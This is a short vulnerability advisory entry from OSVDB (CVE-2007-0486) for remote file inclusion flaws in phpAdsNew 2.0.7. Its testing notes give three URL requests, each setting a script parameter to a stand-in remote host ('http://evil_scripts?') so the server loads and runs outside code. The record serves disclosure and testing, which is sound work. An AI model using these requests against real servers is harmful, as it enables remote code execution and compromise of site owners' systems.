phpAdsNew Multiple Script Remote File Inclusion

2007-01-21T00:24:28
ID OSVDB:33573
Type osvdb
Reporter OSVDB
Modified 2007-01-21T00:24:28

Description

Manual Testing Notes

/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts?

/phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts?

/phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0556.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0517.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0487.html CVE-2007-0486